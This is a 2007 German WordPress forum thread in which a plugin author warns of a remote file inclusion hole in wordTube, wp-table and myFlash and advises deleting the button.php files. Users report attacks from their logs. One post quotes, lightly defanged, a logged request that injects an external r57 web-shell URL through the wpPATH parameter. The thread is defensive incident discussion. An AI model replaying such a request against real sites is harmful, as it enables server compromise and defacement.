01.05.2007, 22:13
| #1 (permalink) |
| PostRank: 4  Registriert seit: 18.11.2006 Ort: Köln
Beiträge: 243
| ACHTUNG -Sicherheitsloch in wordTube und wp-table Hallo, nachdem in myGallery eine Sicherheitslücke entdeckt wurde, hat es auch meine Plugins erwischt. Leider,Leider ... Ich empfehle jeden der WordTube,wp-Table oder myFlash nutzt, das Plugin entweder zu löschen, oder auf die aktuelle Version up zudaten. Am Besten die Dateien : wptable-button.php wordtube-button.php myflash-button.php entfernen, dann kann auch nichts passieren. Die genauen Ausmassen kann ich noch nicht abschätzen. |
|  |
|
02.05.2007, 11:03
| #2 (permalink) |
| PostRank: 10   Registriert seit: 21.10.2006
Beiträge: 3.067
| Aha, hatte mich schon über die Einträge im Logfile gewundert: /wp-content/plugins/wp-table/js/wptable-button.phpp Komisch auch das mit dem .phpp, stimmt das denn so überhaupt? Als Useragent steht übrigens "libwww-perl/5.803" drin. Gruß Ingo
__________________ Brötchen :-) |
|
| |
|
02.05.2007, 11:07
| #3 (permalink) |
| PostRank: 4 Registriert seit: 04.01.2005
Beiträge: 161
| Dito, hab mich über ein paar 404'er gewundert, die von der wordtube-buttons.php mitsamt wpPATH-Insert kamen. Gerade mal auf die neueste Version aktualisiert. Erklärt wenigstens, weshalb gestern AntiVir angesprungen ist, obwohl ich nur auf dem eigenen Blog war... ~fym
__________________ blog.fymmie.de |
|
| |
|
02.05.2007, 11:10
| #4 (permalink) |
| PostRank: 4 Registriert seit: 18.11.2006 Ort: Köln
Beiträge: 243
| Haltet die Logfiles im Auge und sagt Bescheid falls es weiter Varianten gibt. unsere lieben Hacker haben nämlich gerade erst Geschmack bekommen, ich weiss noch nicht welcher weiteren Varianten mit anderen Aufrufen auftauchen. Wer die Button.php löscht ist auf jeden Fall auf der sicheren Seite |
|
| |
|
04.05.2007, 07:46
| #8 (permalink) |
| PostRank: 0  Registriert seit: 30.01.2006
Beiträge: 9
| Hallo Alex, auch bei mir findet sich folgender Eintrag (ich habe ein paar Leerzeichen eingefügt) mehrmals in den Logfiles: GET /wp-content/ plugins/ wordtube/ wordtube-button.php?wp PATH=http:// www dot treibball dot de/ components/ r57 dot txt? HTTP/1.1" 404 1042 "-""libwww-perl/5.79" Ich benutze zum Glück keines der genannten Plugins. Als ich gestern direkt auf die r57 txt bei treibball zugreifen wollte, hat mein Antivirus den Zugriff gestoppt. Auf eine Suche nach wordtube-button bin ich hier gelandet... und möchte doch allen empfehlen, die von Alex genannten Sicherheitsvorkehrungen zu treffen! |
|
| |
|
06.05.2007, 13:07
| #9 (permalink) |
| PostRank: 5 Registriert seit: 25.06.2006
Beiträge: 308
| Mich hat's schon erwischt. Zum Glück war es "nur" ein einfaches Defacement. Mein Bericht siehe hier 
__________________ Blog über japanische Fotografie Japan-Photo.info Geändert von Ferdinand (06.05.2007 um 13:13 Uhr). |
|
| |
|
06.05.2007, 13:14
| #10 (permalink) |
| PostRank: 4  Registriert seit: 27.12.2006 Ort: Kreuzberg
Beiträge: 260
| Hallo Alex, Danke für den Hinweis. Heise sagt, dass die neuesten Versionen von Wordtube und Myflash nicht betroffen sind. Kannst Du das bestätigen zum derzeitigen Zeitpunkt...? Beste Grüße Herr Nack |
|
| |
 |
| Lesezeichen |
| Themen-Optionen | |
| Ansicht | |
Linear-Darstellung
| |
Alle Zeitangaben in WEZ +1. Es ist jetzt 14:09 Uhr.